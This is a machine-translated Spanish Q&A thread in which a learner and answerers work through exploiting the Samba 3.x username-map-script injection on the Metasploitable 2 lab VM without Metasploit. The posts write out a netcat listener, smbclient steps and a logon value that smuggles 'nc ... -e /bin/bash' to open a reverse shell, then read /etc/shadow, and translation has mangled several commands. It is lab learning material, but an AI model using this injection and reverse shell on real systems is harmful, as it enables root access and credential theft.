Conexión inversa Metasploitable 2 - Kali Linux (Samba 3.x) sin Metasploit

5

Estoy tratando de explotar Metasploitable 2 sin el uso de Metasploit, con el objetivo de aprender. En este caso, me estoy enfocando en Samba 3.x (Puerto TCP 139, 445)

En este enlace enlace se explican dos métodos diferentes para explotar esta máquina después de que un escaneo de nmap revela puertos TCP 139 y 445 abiertos, que ejecutan la versión 3.x de Samba.

El segundo método explica que

  

Esta vulnerabilidad aprovecha la funcionalidad de "script de mapa de nombre de usuario" de Samba. No se filtra la entrada del usuario, por lo que un atacante podría conectarse a una sesión SMB y usar metacaracteres de shell como entrada para el nombre de usuario, lo que provocaría que los comandos se ejecutaran en el sistema remoto. Esto podría permitir al atacante obtener un shell remoto para la máquina víctima con acceso de raíz.

Mi problema surge cuando se usa Metasploit, como se usa en:

Finalmente encontré este video enlace que evita Metasploit pero no me funciona, donde sigue (Kali = 192.168.200.1; Metasploitable2 = 192.168.200.130):

  1. En la ventana de Terminal 1, configuramos netcat para escuchar:

    netcat -nlvp 4444

  2. En la ventana de Terminal 2, verificamos el recurso compartido

    smbclient -L //192.168.200.130

  3. Nos centramos en la carpeta tmp y conectamos (Terminal 2):

    smbclient //192.168.200.130/tmp

  4. Finalmente, obtenemos "smb: >" donde el comando "inicio de sesión" se utiliza para revertir la conexión con Kali, como

    smb: > iniciar sesión "/ = nc 192.168.200.1 4444 -e /bin/bash "

Este último punto no me funciona con el siguiente mensaje de error "error en la configuración de la sesión: NT_STATUS_NO_MEMORY".

Es difícil para mí encontrar un buen manual que explique el comando de "inicio de sesión". Intenté cambiar la forma en que se usa netcat:

En el punto 1. Escribo

smb: \> nc -nlvp 4444 -e /bin/bash

En el punto 4. Escribo

smb: \> logon "/='nc 192.168.200.1 4444 -e /bin/bash'"

Los mismos resultados. Mismo mensaje de error.

Realmente intenté hacerlo solo, pero no pude. Le agradecería que me ayudara.

¡Gracias de antemano!

    
pregunta J.g. 08.01.2018 - 18:22
fuente

2 respuestas

2

Parece que está configurando su escucha en smb (cuadro vulnerable).

smb: \> nc -nlvp 4444 -e /bin/bash

Lo que deberías hacer es configurar al oyente en tu casilla de ataque. utilizando el siguiente comando en su lugar:

nc -nlvp 4444 

Finalmente, desde tu metasploitable2, emites el comando:

logon "/='nc 'attack box ip' 4444 -e /bin/bash'"
    
respondido por el helloGo 12.08.2018 - 23:08
fuente
1

Para aquellos que tuvieron el mismo problema que yo, respondo cómo lo resolví, de acuerdo con las respuestas anteriores, y a este enlace Metasploitable 2 - Samba

Los pasos a seguir son:

  1. Abrimos la ventana de Terminal 1, y configuramos netcat para escuchar:

    netcat -nlvp 4444

  2. Abrimos la ventana de la Terminal 2, verificamos las acciones de la víctima:

    smbclient -L //192.168.200.130

  3. (Terminal 2) Nos centramos en la carpeta tmp y nos conectamos con la víctima:

    smbclient //192.168.200.130/tmp

  4. (Terminal 2) Finalmente, obtenemos smb: > donde se usa el comando logon para revertir la conexión con Kali, como

    smb: \ > inicio de sesión "/ = 'nc 192.168.200.1 4444 -e / bin / bash'"

Cuidado: no olvides la marca de retroceso.

  1. (Terminal 1) Podemos ver la conexión establecida y podemos insertar nuestros comandos deseados. Ejemplo:

    • id
    • hostname
    • uname -a
    • cat /etc/shadow

Cuando se le solicite la contraseña, simplemente haga clic en entrar (dejando en blanco).

    
respondido por el J.g. 14.08.2018 - 15:12
fuente

Lea otras preguntas en las etiquetas